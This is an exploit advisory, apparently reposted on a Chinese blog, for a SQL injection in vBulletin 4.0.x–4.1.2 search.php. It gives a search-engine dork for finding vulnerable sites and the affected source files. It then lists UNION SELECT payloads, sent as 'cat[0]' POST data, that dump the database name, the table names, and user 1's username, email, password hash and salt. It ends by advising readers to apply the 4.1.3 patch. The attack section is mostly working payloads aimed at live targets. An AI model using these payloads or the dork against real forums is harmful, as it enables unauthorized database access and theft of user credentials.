/plus/search.php sql注入漏洞,vBulletin 4.0.x => 4.1.2 (search.php)SQL注入漏洞

====================================================================

#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#

====================================================================

#                                                                  #

#         888     d8          888   _   888          ,d   d8       #

#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #

#   d888  888   d888   888    888d8b    888  888b   888  888       #

#   8888  888  / 888   888    888Y88b   888  8888   888  888       #

#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #

#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #

#                                                                  #

====================================================================

#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#

====================================================================

#[+] Discovered By   : D4rkB1t

#[+] Site            : NaN

#[+] support e-mail  : d4rkb1t@live.com

Product: http://www.vbulletin.com

Version: 4.0.x

Dork : inurl:"search.php?search_type=1"

--------------------------

#   ~Vulnerable Codes~   #

--------------------------

/vb/search/searchtools.php - line 715;

/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------

#        ~Exploit~       #

--------------------------

POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#

&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#

&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------

#        ~Advice~        #

--------------------------

Vendor already released a patch on vb#4.1.3.

UPDATE NOW!

====================================================================

#  [2011-5-21]

=============================================================

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值